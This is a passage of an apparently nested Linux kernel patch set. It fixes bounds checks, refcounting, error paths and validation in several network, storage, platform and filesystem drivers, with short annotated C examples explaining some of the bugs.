+diff --git a/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h b/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
+index 48dbfea0a2a1d..7cdf0ce24f288 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
++++ b/drivers/net/ethernet/mellanox/mlxsw/pci_hw.h
+@@ -26,7 +26,7 @@
+ #define MLXSW_PCI_CIR_TIMEOUT_MSECS		1000
+ 
+ #define MLXSW_PCI_SW_RESET_TIMEOUT_MSECS	900000
+-#define MLXSW_PCI_SW_RESET_WAIT_MSECS		200
++#define MLXSW_PCI_SW_RESET_WAIT_MSECS		400
+ #define MLXSW_PCI_FW_READY			0xA1844
+ #define MLXSW_PCI_FW_READY_MASK			0xFFFF
+ #define MLXSW_PCI_FW_READY_MAGIC		0x5E
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 6a1bff54bc6c3..e6aedd8ebd750 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -541,7 +541,6 @@ int efx_net_open(struct net_device *net_dev)
+ 	else
+ 		efx->state = STATE_NET_UP;
+ 
+-	efx_selftest_async_start(efx);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/sfc/efx_common.c b/drivers/net/ethernet/sfc/efx_common.c
+index c2224e41a694d..ee1cabe3e2429 100644
+--- a/drivers/net/ethernet/sfc/efx_common.c
++++ b/drivers/net/ethernet/sfc/efx_common.c
+@@ -544,6 +544,8 @@ void efx_start_all(struct efx_nic *efx)
+ 	/* Start the hardware monitor if there is one */
+ 	efx_start_monitor(efx);
+ 
++	efx_selftest_async_start(efx);
++
+ 	/* Link state detection is normally event-driven; we have
+ 	 * to poll now because we could have missed a change
+ 	 */
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 20b1b34a092ad..3f1883814ce21 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -724,8 +724,13 @@ static struct page *xdp_linearize_page(struct receive_queue *rq,
+ 				       int page_off,
+ 				       unsigned int *len)
+ {
+-	struct page *page = alloc_page(GFP_ATOMIC);
++	int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	struct page *page;
+ 
++	if (page_off + *len + tailroom > PAGE_SIZE)
++		return NULL;
++
++	page = alloc_page(GFP_ATOMIC);
+ 	if (!page)
+ 		return NULL;
+ 
+@@ -733,7 +738,6 @@ static struct page *xdp_linearize_page(struct receive_queue *rq,
+ 	page_off += *len;
+ 
+ 	while (--*num_buf) {
+-		int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+ 		unsigned int buflen;
+ 		void *buf;
+ 		int off;
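
The fix computes the skb_shared_info tailroom once and rejects the linearization up front when offset, length, and tailroom cannot all fit in one page, rather than failing mid-copy. The guard is plain arithmetic; a standalone sketch with an illustrative tailroom value:

#include <stdbool.h>
#include <stdio.h>

#define PAGE_SIZE 4096u

/* Stand-in for SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
 * the real value is arch-dependent, 320 is only illustrative. */
#define TAILROOM 320u

static bool fits_in_page(unsigned int page_off, unsigned int len)
{
	return page_off + len + TAILROOM <= PAGE_SIZE;
}

int main(void)
{
	printf("%d\n", fits_in_page(256, 3000));	/* 1: fits */
	printf("%d\n", fits_in_page(256, 3600));	/* 0: would overflow */
	return 0;
}
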
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index 5c266062c08f0..c35c085dbc877 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -996,10 +996,8 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue,
+ 
+ 		/* No crossing a page as the payload mustn't fragment. */
+ 		if (unlikely((txreq.offset + txreq.size) > XEN_PAGE_SIZE)) {
+-			netdev_err(queue->vif->dev,
+-				   "txreq.offset: %u, size: %u, end: %lu\n",
+-				   txreq.offset, txreq.size,
+-				   (unsigned long)(txreq.offset&~XEN_PAGE_MASK) + txreq.size);
++			netdev_err(queue->vif->dev, "Cross page boundary, txreq.offset: %u, size: %u\n",
++				   txreq.offset, txreq.size);
+ 			xenvif_fatal_tx_err(queue->vif);
+ 			break;
+ 		}
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index bb80192c16b6b..8f17cbec5a0e4 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1604,22 +1604,7 @@ static int nvme_tcp_alloc_queue(struct nvme_ctrl *nctrl, int qid)
+ 	if (ret)
+ 		goto err_init_connect;
+ 
+-	queue->rd_enabled = true;
+ 	set_bit(NVME_TCP_Q_ALLOCATED, &queue->flags);
+-	nvme_tcp_init_recv_ctx(queue);
+-
+-	write_lock_bh(&queue->sock->sk->sk_callback_lock);
+-	queue->sock->sk->sk_user_data = queue;
+-	queue->state_change = queue->sock->sk->sk_state_change;
+-	queue->data_ready = queue->sock->sk->sk_data_ready;
+-	queue->write_space = queue->sock->sk->sk_write_space;
+-	queue->sock->sk->sk_data_ready = nvme_tcp_data_ready;
+-	queue->sock->sk->sk_state_change = nvme_tcp_state_change;
+-	queue->sock->sk->sk_write_space = nvme_tcp_write_space;
+-#ifdef CONFIG_NET_RX_BUSY_POLL
+-	queue->sock->sk->sk_ll_usec = 1;
+-#endif
+-	write_unlock_bh(&queue->sock->sk->sk_callback_lock);
+ 
+ 	return 0;
+ 
+@@ -1639,7 +1624,7 @@ err_destroy_mutex:
+ 	return ret;
+ }
+ 
+-static void nvme_tcp_restore_sock_calls(struct nvme_tcp_queue *queue)
++static void nvme_tcp_restore_sock_ops(struct nvme_tcp_queue *queue)
+ {
+ 	struct socket *sock = queue->sock;
+ 
+@@ -1654,7 +1639,7 @@ static void nvme_tcp_restore_sock_calls(struct nvme_tcp_queue *queue)
+ static void __nvme_tcp_stop_queue(struct nvme_tcp_queue *queue)
+ {
+ 	kernel_sock_shutdown(queue->sock, SHUT_RDWR);
+-	nvme_tcp_restore_sock_calls(queue);
++	nvme_tcp_restore_sock_ops(queue);
+ 	cancel_work_sync(&queue->io_work);
+ }
+ 
+@@ -1672,21 +1657,42 @@ static void nvme_tcp_stop_queue(struct nvme_ctrl *nctrl, int qid)
+ 	mutex_unlock(&queue->queue_lock);
+ }
+ 
++static void nvme_tcp_setup_sock_ops(struct nvme_tcp_queue *queue)
++{
++	write_lock_bh(&queue->sock->sk->sk_callback_lock);
++	queue->sock->sk->sk_user_data = queue;
++	queue->state_change = queue->sock->sk->sk_state_change;
++	queue->data_ready = queue->sock->sk->sk_data_ready;
++	queue->write_space = queue->sock->sk->sk_write_space;
++	queue->sock->sk->sk_data_ready = nvme_tcp_data_ready;
++	queue->sock->sk->sk_state_change = nvme_tcp_state_change;
++	queue->sock->sk->sk_write_space = nvme_tcp_write_space;
++#ifdef CONFIG_NET_RX_BUSY_POLL
++	queue->sock->sk->sk_ll_usec = 1;
++#endif
++	write_unlock_bh(&queue->sock->sk->sk_callback_lock);
++}
++
+ static int nvme_tcp_start_queue(struct nvme_ctrl *nctrl, int idx)
+ {
+ 	struct nvme_tcp_ctrl *ctrl = to_tcp_ctrl(nctrl);
++	struct nvme_tcp_queue *queue = &ctrl->queues[idx];
+ 	int ret;
+ 
++	queue->rd_enabled = true;
++	nvme_tcp_init_recv_ctx(queue);
++	nvme_tcp_setup_sock_ops(queue);
++
+ 	if (idx)
+ 		ret = nvmf_connect_io_queue(nctrl, idx);
+ 	else
+ 		ret = nvmf_connect_admin_queue(nctrl);
+ 
+ 	if (!ret) {
+-		set_bit(NVME_TCP_Q_LIVE, &ctrl->queues[idx].flags);
++		set_bit(NVME_TCP_Q_LIVE, &queue->flags);
+ 	} else {
+-		if (test_bit(NVME_TCP_Q_ALLOCATED, &ctrl->queues[idx].flags))
+-			__nvme_tcp_stop_queue(&ctrl->queues[idx]);
++		if (test_bit(NVME_TCP_Q_ALLOCATED, &queue->flags))
++			__nvme_tcp_stop_queue(queue);
+ 		dev_err(nctrl->device,
+ 			"failed to connect queue: %d ret=%d\n", idx, ret);
+ 	}
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index cb15acdf14a30..e2c9a68d12df9 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -464,7 +464,8 @@ static const struct dmi_system_id asus_quirks[] = {
+ 		.ident = "ASUS ROG FLOW X13",
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "GV301Q"),
++			/* Match GV301** */
++			DMI_MATCH(DMI_PRODUCT_NAME, "GV301"),
+ 		},
+ 		.driver_data = &quirk_asus_tablet_mode,
+ 	},
+diff --git a/drivers/platform/x86/gigabyte-wmi.c b/drivers/platform/x86/gigabyte-wmi.c
+index 322cfaeda17ba..2a426040f749e 100644
+--- a/drivers/platform/x86/gigabyte-wmi.c
++++ b/drivers/platform/x86/gigabyte-wmi.c
+@@ -140,6 +140,7 @@ static u8 gigabyte_wmi_detect_sensor_usability(struct wmi_device *wdev)
+ 	}}
+ 
+ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("A320M-S2H V2-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H WIFI-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M S2H V2"),
+@@ -150,6 +151,7 @@ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550I AORUS PRO AX"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550M AORUS PRO-P"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550M DS3H"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B650 AORUS ELITE AX"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B660 GAMING X DDR4"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B660I AORUS PRO DDR4"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("Z390 I AORUS PRO WIFI-CF"),
+@@ -159,6 +161,7 @@ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 GAMING X"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 I AORUS PRO WIFI"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570 UD"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("X570S AORUS ELITE"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("Z690M AORUS ELITE AX DDR4"),
+ 	{ }
+ };
+diff --git a/drivers/platform/x86/intel/vsec.c b/drivers/platform/x86/intel/vsec.c
+index bb81b8b1f7e9b..483bb65651665 100644
+--- a/drivers/platform/x86/intel/vsec.c
++++ b/drivers/platform/x86/intel/vsec.c
+@@ -141,6 +141,7 @@ static int intel_vsec_add_aux(struct pci_dev *pdev, struct intel_vsec_device *in
+ 
+ 	ret = ida_alloc(intel_vsec_dev->ida, GFP_KERNEL);
+ 	if (ret < 0) {
++		kfree(intel_vsec_dev->resource);
+ 		kfree(intel_vsec_dev);
+ 		return ret;
+ 	}
+diff --git a/drivers/regulator/fan53555.c b/drivers/regulator/fan53555.c
+index dac1fb584fa35..ecd5a50c61660 100644
+--- a/drivers/regulator/fan53555.c
++++ b/drivers/regulator/fan53555.c
+@@ -8,18 +8,19 @@
+ // Copyright (c) 2012 Marvell Technology Ltd.
+ // Yunfan Zhang <yfzhang@marvell.com>
+ 
++#include <linux/bits.h>
++#include <linux/err.h>
++#include <linux/i2c.h>
+ #include <linux/module.h>
++#include <linux/of_device.h>
+ #include <linux/param.h>
+-#include <linux/err.h>
+ #include <linux/platform_device.h>
++#include <linux/regmap.h>
+ #include <linux/regulator/driver.h>
++#include <linux/regulator/fan53555.h>
+ #include <linux/regulator/machine.h>
+ #include <linux/regulator/of_regulator.h>
+-#include <linux/of_device.h>
+-#include <linux/i2c.h>
+ #include <linux/slab.h>
+-#include <linux/regmap.h>
+-#include <linux/regulator/fan53555.h>
+ 
+ /* Voltage setting */
+ #define FAN53555_VSEL0		0x00
+@@ -60,7 +61,7 @@
+ #define TCS_VSEL1_MODE		(1 << 6)
+ 
+ #define TCS_SLEW_SHIFT		3
+-#define TCS_SLEW_MASK		(0x3 < 3)
++#define TCS_SLEW_MASK		GENMASK(4, 3)
+ 
+ enum fan53555_vendor {
+ 	FAN53526_VENDOR_FAIRCHILD = 0,
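
The one-character bug fixed in the fan53555 hunk above is easy to miss: the old macro wrote '<' where '<<' was intended, so TCS_SLEW_MASK evaluated to the comparison 0x3 < 3, which is 0, and the slew-rate field was never actually masked. A standalone demonstration:

#include <stdio.h>

#define BITS_PER_LONG (8 * sizeof(unsigned long))
/* GENMASK(h, l): bits h..l set, as in include/linux/bits.h */
#define GENMASK(h, l) \
	(((~0UL) << (l)) & (~0UL >> (BITS_PER_LONG - 1 - (h))))

int main(void)
{
	unsigned long buggy = (0x3 < 3);	/* a comparison, not a shift */
	unsigned long fixed = GENMASK(4, 3);

	printf("buggy: 0x%lx\n", buggy);	/* 0x0: masks nothing */
	printf("fixed: 0x%lx\n", fixed);	/* 0x18: bits 4 and 3 */
	return 0;
}
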
+diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
+index d265a2d9d0824..13ee8e4c4f570 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_base.c
++++ b/drivers/scsi/megaraid/megaraid_sas_base.c
+@@ -3299,7 +3299,7 @@ fw_crash_buffer_show(struct device *cdev,
+ 
+ 	spin_lock_irqsave(&instance->crashdump_lock, flags);
+ 	buff_offset = instance->fw_crash_buffer_offset;
+-	if (!instance->crash_dump_buf &&
++	if (!instance->crash_dump_buf ||
+ 		!((instance->fw_crash_state == AVAILABLE) ||
+ 		(instance->fw_crash_state == COPYING))) {
+ 		dev_err(&instance->pdev->dev,
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index 24c4c92543599..3cda5d26b66ca 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -314,11 +314,18 @@ static int scsi_vpd_inquiry(struct scsi_device *sdev, unsigned char *buffer,
+ 	if (result)
+ 		return -EIO;
+ 
+-	/* Sanity check that we got the page back that we asked for */
++	/*
++	 * Sanity check that we got the page back that we asked for and that
++	 * the page size is not 0.
++	 */
+ 	if (buffer[1] != page)
+ 		return -EIO;
+ 
+-	return get_unaligned_be16(&buffer[2]) + 4;
++	result = get_unaligned_be16(&buffer[2]);
++	if (!result)
++		return -EIO;
++
++	return result + 4;
+ }
+ 
+ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
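
The added check matters because a device can echo the correct page code with a zero payload length, and the old code would then return 4, which callers treat as a valid (if tiny) buffer size. A standalone sketch of the VPD header parsing with both guards:

#include <stdio.h>
#include <stdint.h>

/* Parse a SCSI VPD page header: byte 1 is the page code, bytes 2-3
 * the big-endian payload length. Returns the total page length
 * (payload plus 4-byte header) or -1 on error. */
static int vpd_page_size(const uint8_t *buf, uint8_t expected_page)
{
	uint16_t len;

	if (buf[1] != expected_page)
		return -1;		/* wrong page echoed back */

	len = (uint16_t)(buf[2] << 8 | buf[3]);
	if (!len)
		return -1;		/* zero-length page: treat as error */

	return len + 4;
}

int main(void)
{
	const uint8_t good[4] = { 0x00, 0x80, 0x00, 0x18 };
	const uint8_t bad[4]  = { 0x00, 0x80, 0x00, 0x00 };

	printf("good: %d\n", vpd_page_size(good, 0x80));	/* 28 */
	printf("bad:  %d\n", vpd_page_size(bad, 0x80));		/* -1 */
	return 0;
}
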
+diff --git a/drivers/spi/spi-rockchip-sfc.c b/drivers/spi/spi-rockchip-sfc.c
+index bd87d3c92dd33..69347b6bf60cd 100644
+--- a/drivers/spi/spi-rockchip-sfc.c
++++ b/drivers/spi/spi-rockchip-sfc.c
+@@ -632,7 +632,7 @@ static int rockchip_sfc_probe(struct platform_device *pdev)
+ 	if (ret) {
+ 		dev_err(dev, "Failed to request irq\n");
+ 
+-		return ret;
++		goto err_irq;
+ 	}
+ 
+ 	ret = rockchip_sfc_init(sfc);
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index b8ae02aa632e3..4abbe4b352533 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -523,7 +523,7 @@ void replace_extent_mapping(struct extent_map_tree *tree,
+ 	setup_extent_mapping(tree, new, modified);
+ }
+ 
+-static struct extent_map *next_extent_map(struct extent_map *em)
++static struct extent_map *next_extent_map(const struct extent_map *em)
+ {
+ 	struct rb_node *next;
+ 
+@@ -533,6 +533,35 @@ static struct extent_map *next_extent_map(struct extent_map *em)
+ 	return container_of(next, struct extent_map, rb_node);
+ }
+ 
++/*
++ * Get the extent map that immediately follows another one.
++ *
++ * @tree:       The extent map tree that the extent map belongs to.
++ *              Holding read or write access on the tree's lock is required.
++ * @em:         An extent map from the given tree. The caller must ensure that
++ *              between getting @em and calling this function, the
++ *              extent map @em is not removed from the tree - for example, by
++ *              holding the tree's lock for the duration of those two operations.
++ *
++ * Returns the extent map that immediately follows @em, or NULL if @em is the
++ * last extent map in the tree.
++ */
++struct extent_map *btrfs_next_extent_map(const struct extent_map_tree *tree,
++					 const struct extent_map *em)
++{
++	struct extent_map *next;
++
++	/* The lock must be acquired either in read mode or write mode. */
++	lockdep_assert_held(&tree->lock);
++	ASSERT(extent_map_in_tree(em));
++
++	next = next_extent_map(em);
++	if (next)
++		refcount_inc(&next->refs);
++
++	return next;
++}
++
+ static struct extent_map *prev_extent_map(struct extent_map *em)
+ {
+ 	struct rb_node *prev;
+diff --git a/fs/btrfs/extent_map.h b/fs/btrfs/extent_map.h
+index ad311864272a0..68d3f2c9ea1d8 100644
+--- a/fs/btrfs/extent_map.h
++++ b/fs/btrfs/extent_map.h
+@@ -87,6 +87,8 @@ static inline u64 extent_map_block_end(struct extent_map *em)
+ void extent_map_tree_init(struct extent_map_tree *tree);
+ struct extent_map *lookup_extent_mapping(struct extent_map_tree *tree,
+ 					 u64 start, u64 len);
++struct extent_map *btrfs_next_extent_map(const struct extent_map_tree *tree,
++					 const struct extent_map *em);
+ int add_extent_mapping(struct extent_map_tree *tree,
+ 		       struct extent_map *em, int modified);
+ void remove_extent_mapping(struct extent_map_tree *tree, struct extent_map *em);
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 1bda59c683602..77202addead83 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -3248,40 +3248,50 @@ static bool find_delalloc_subrange(struct btrfs_inode *inode, u64 start, u64 end
+ 	 */
+ 	read_lock(&em_tree->lock);
+ 	em = lookup_extent_mapping(em_tree, start, len);
+-	read_unlock(&em_tree->lock);
++	if (!em) {
++		read_unlock(&em_tree->lock);
++		return (delalloc_len > 0);
++	}
+ 
+ 	/* extent_map_end() returns a non-inclusive end offset. */
+-	em_end = em ? extent_map_end(em) : 0;
++	em_end = extent_map_end(em);
+ 
+ 	/*
+ 	 * If we have a hole/prealloc extent map, check the next one if this one
+ 	 * ends before our range's end.
+ 	 */
+-	if (em && (em->block_start == EXTENT_MAP_HOLE ||
+-		   test_bit(EXTENT_FLAG_PREALLOC, &em->flags)) && em_end < end) {
++	if ((em->block_start == EXTENT_MAP_HOLE ||
++	     test_bit(EXTENT_FLAG_PREALLOC, &em->flags)) && em_end < end) {
+ 		struct extent_map *next_em;
+ 
+-		read_lock(&em_tree->lock);
+-		next_em = lookup_extent_mapping(em_tree, em_end, len - em_end);
+-		read_unlock(&em_tree->lock);
+-
++		next_em = btrfs_next_extent_map(em_tree, em);
+ 		free_extent_map(em);
+-		em_end = next_em ? extent_map_end(next_em) : 0;
++
++		/*
++		 * If there's no next extent map, or the next one starts beyond
++		 * our range, return the range found in the io tree (if any).
++		 */
++		if (!next_em || next_em->start > end) {
++			read_unlock(&em_tree->lock);
++			free_extent_map(next_em);
++			return (delalloc_len > 0);
++		}
++
++		em_end = extent_map_end(next_em);
+ 		em = next_em;
+ 	}
+ 
+-	if (em && (em->block_start == EXTENT_MAP_HOLE ||
+-		   test_bit(EXTENT_FLAG_PREALLOC, &em->flags))) {
+-		free_extent_map(em);
+-		em = NULL;
+-	}
++	read_unlock(&em_tree->lock);
+ 
+ 	/*
+-	 * No extent map or one for a hole or prealloc extent. Use the delalloc
+-	 * range we found in the io tree if we have one.
++	 * If we have a hole or prealloc extent that ends at or beyond our
++	 * range's end, return the range found in the io tree (if any).
+ 	 */
+-	if (!em)
++	if (em->block_start == EXTENT_MAP_HOLE ||
++	    test_bit(EXTENT_FLAG_PREALLOC, &em->flags)) {
++		free_extent_map(em);
+ 		return (delalloc_len > 0);
++	}
+ 
+ 	/*
+ 	 * We don't have any range as EXTENT_DELALLOC in the io tree, so the
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index 9958d40207712..aa33c39be1829 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -974,6 +974,16 @@ restart:
+ 			continue;
+ 		}
+ 
++		/*
++		 * If wb_tryget fails, the wb has been shut down; skip it.
++		 *
++		 * Pin @wb so that it stays on @bdi->wb_list.  This allows
++		 * continuing iteration from @wb after dropping and
++		 * regrabbing rcu read lock.
++		 */
++		if (!wb_tryget(wb))
++			continue;
++
+ 		/* alloc failed, execute synchronously using on-stack fallback */
+ 		work = &fallback_work;
+ 		*work = *base_work;
+@@ -982,13 +992,6 @@ restart:
+ 		work->done = &fallback_work_done;
+ 
+ 		wb_queue_work(wb, work);
+-
+-		/*
+-		 * Pin @wb so that it stays on @bdi->wb_list.  This allows
+-		 * continuing iteration from @wb after dropping and
+-		 * regrabbing rcu read lock.
+-		 */
+-		wb_get(wb);
+ 		last_wb = wb;
+ 
+ 		rcu_read_unlock();
+diff --git a/fs/fuse/dir.c b/fs/fuse/dir.c
+index bb97a384dc5dd..904673a4f6902 100644
+--- a/fs/fuse/dir.c
++++ b/fs/fuse/dir.c
+@@ -214,7 +214,7 @@ static int fuse_dentry_revalidate(struct dentry *entry, unsigned int flags)
+ 	if (inode && fuse_is_bad(inode))
+ 		goto invalid;
+ 	else if (time_before64(fuse_dentry_time(entry), get_jiffies_64()) ||
+-		 (flags & (LOOKUP_EXCL | LOOKUP_REVAL))) {
++		 (flags & (LOOKUP_EXCL | LOOKUP_REVAL | LOOKUP_RENAME_TARGET))) {
+ 		struct fuse_entry_out outarg;
+ 		FUSE_ARGS(args);
+ 		struct fuse_forget_link *forget;
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 63d96a1733b2a..101f2ce6ba376 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -430,6 +430,23 @@ static int nilfs_segctor_reset_segment_buffer(struct nilfs_sc_info *sci)
+ 	return 0;
+ }
+ 
++/**
++ * nilfs_segctor_zeropad_segsum - zero pad the rest of the segment summary area
++ * @sci: segment constructor object
++ *
++ * nilfs_segctor_zeropad_segsum() zero-fills unallocated space at the end of
++ * the current segment summary block.
++ */
++static void nilfs_segctor_zeropad_segsum(struct nilfs_sc_info *sci)
++{
++	struct nilfs_segsum_pointer *ssp;
++
++	ssp = sci->sc_blk_cnt > 0 ? &sci->sc_binfo_ptr : &sci->sc_finfo_ptr;
++	if (ssp->offset < ssp->bh->b_size)
++		memset(ssp->bh->b_data + ssp->offset, 0,
++		       ssp->bh->b_size - ssp->offset);
++}
++
+ static int nilfs_segctor_feed_segment(struct nilfs_sc_info *sci)
+ {
+ 	sci->sc_nblk_this_inc += sci->sc_curseg->sb_sum.nblocks;
+@@ -438,6 +455,7 @@ static int nilfs_segctor_feed_segment(struct nilfs_sc_info *sci)
+ 				* The current segment is filled up
+ 				* (internal code)
+ 				*/
++	nilfs_segctor_zeropad_segsum(sci);
+ 	sci->sc_curseg = NILFS_NEXT_SEGBUF(sci->sc_curseg);
+ 	return nilfs_segctor_reset_segment_buffer(sci);
+ }
+@@ -542,6 +560,7 @@ static int nilfs_segctor_add_file_block(struct nilfs_sc_info *sci,
+ 		goto retry;
+ 	}
+ 	if (unlikely(required)) {
++		nilfs_segctor_zeropad_segsum(sci);
+ 		err = nilfs_segbuf_extend_segsum(segbuf);
+ 		if (unlikely(err))
+ 			goto failed;
+@@ -1531,6 +1550,7 @@ static int nilfs_segctor_collect(struct nilfs_sc_info *sci,
+ 		nadd = min_t(int, nadd << 1, SC_MAX_SEGDELTA);
+ 		sci->sc_stage = prev_stage;
+ 	}
++	nilfs_segctor_zeropad_segsum(sci);
+ 	nilfs_segctor_truncate_segments(sci, sci->sc_curseg, nilfs->ns_sufile);
+ 	return 0;
+ 
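
The nilfs2 helper added above is the usual "zero the unused tail of a
fixed-size block" idiom: everything from the current write offset to the end
of the buffer is cleared so stale bytes never hit the disk. A minimal
standalone version of the same pattern (names invented for illustration):

#include <stdio.h>
#include <string.h>

#define BLOCK_SIZE 16

static void zeropad_tail(unsigned char *block, size_t used)
{
	if (used < BLOCK_SIZE)
		memset(block + used, 0, BLOCK_SIZE - used);
}

int main(void)
{
	unsigned char block[BLOCK_SIZE];

	memset(block, 0xaa, sizeof(block));	/* simulate stale contents */
	zeropad_tail(block, 6);			/* first 6 bytes are in use */
	for (size_t i = 0; i < sizeof(block); i++)
		printf("%02x%c", block[i], i + 1 < sizeof(block) ? ' ' : '\n');
	return 0;
}
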
+diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
+index cc694846617a5..154c103eca751 100644
+--- a/fs/userfaultfd.c
++++ b/fs/userfaultfd.c
+@@ -1966,8 +1966,10 @@ static int userfaultfd_api(struct userfaultfd_ctx *ctx,
+ 	ret = -EFAULT;
+ 	if (copy_from_user(&uffdio_api, buf, sizeof(uffdio_api)))
+ 		goto out;
+-	/* Ignore unsupported features (userspace built against newer kernel) */
+-	features = uffdio_api.features & UFFD_API_FEATURES;
++	features = uffdio_api.features;
++	ret = -EINVAL;
++	if (uffdio_api.api != UFFD_API || (features & ~UFFD_API_FEATURES))
++		goto err_out;
+ 	ret = -EPERM;
+ 	if ((features & UFFD_FEATURE_EVENT_FORK) && !capable(CAP_SYS_PTRACE))
+ 		goto err_out;
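
The userfaultfd change turns "silently mask off unknown feature bits" into
"reject them". The test features & ~UFFD_API_FEATURES is the standard idiom
for spotting bits the caller set that the kernel does not understand. A
sketch with an invented feature mask (the real UFFD_API_FEATURES differs):

#include <stdio.h>
#include <stdint.h>

#define API_FEATURES	(0x1u | 0x2u | 0x8u)	/* hypothetical */

static int validate_features(uint32_t requested)
{
	if (requested & ~API_FEATURES)
		return -1;	/* unknown bit requested: reject */
	return 0;
}

int main(void)
{
	printf("0x3: %d\n", validate_features(0x3));	/*  0: all bits known */
	printf("0x7: %d\n", validate_features(0x7));	/* -1: 0x4 is unknown */
	return 0;
}
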
+diff --git a/include/linux/kmsan.h b/include/linux/kmsan.h
+index e38ae3c346184..30b17647ce3c7 100644
+--- a/include/linux/kmsan.h
++++ b/include/linux/kmsan.h
+@@ -134,11 +134,12 @@ void kmsan_kfree_large(const void *ptr);
+  * @page_shift:	page_shift passed to vmap_range_noflush().
+  *
+  * KMSAN maps shadow and origin pages of @pages into contiguous ranges in
+- * vmalloc metadata address range.
++ * vmalloc metadata address range. Returns 0 on success; callers must check
++ * for a non-zero return value.
+  */
+-void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+-				    pgprot_t prot, struct page **pages,
+-				    unsigned int page_shift);
++int kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
++				   pgprot_t prot, struct page **pages,
++				   unsigned int page_shift);
+ 
+ /**
+  * kmsan_vunmap_kernel_range_noflush() - Notify KMSAN about a vunmap.
+@@ -159,11 +160,12 @@ void kmsan_vunmap_range_noflush(unsigned long start, unsigned long end);
+  * @page_shift:	page_shift argument passed to vmap_range_noflush().
+  *
+  * KMSAN creates new metadata pages for the physical pages mapped into the
+- * virtual memory.
++ * virtual memory. Returns 0 on success; callers must check for a non-zero
++ * return value.
+  */
+-void kmsan_ioremap_page_range(unsigned long addr, unsigned long end,
+-			      phys_addr_t phys_addr, pgprot_t prot,
+-			      unsigned int page_shift);
++int kmsan_ioremap_page_range(unsigned long addr, unsigned long end,
++			     phys_addr_t phys_addr, pgprot_t prot,
++			     unsigned int page_shift);
+ 
+ /**
+  * kmsan_iounmap_page_range() - Notify KMSAN about an iounmap_page_range() call.
+@@ -281,12 +283,13 @@ static inline void kmsan_kfree_large(const void *ptr)
+ {
+ }
+ 
+-static inline void kmsan_vmap_pages_range_noflush(unsigned long start,
+-						  unsigned long end,
+-						  pgprot_t prot,
+-						  struct page **pages,
+-						  unsigned int page_shift)
++static inline int kmsan_vmap_pages_range_noflush(unsigned long start,
++						 unsigned long end,
++						 pgprot_t prot,
++						 struct page **pages,
++						 unsigned int page_shift)
+ {
++	return 0;
+ }
+ 
+ static inline void kmsan_vunmap_range_noflush(unsigned long start,
+@@ -294,12 +297,12 @@ static inline void kmsan_vunmap_range_noflush(unsigned long start,
+ {
+ }
+ 
+-static inline void kmsan_ioremap_page_range(unsigned long start,
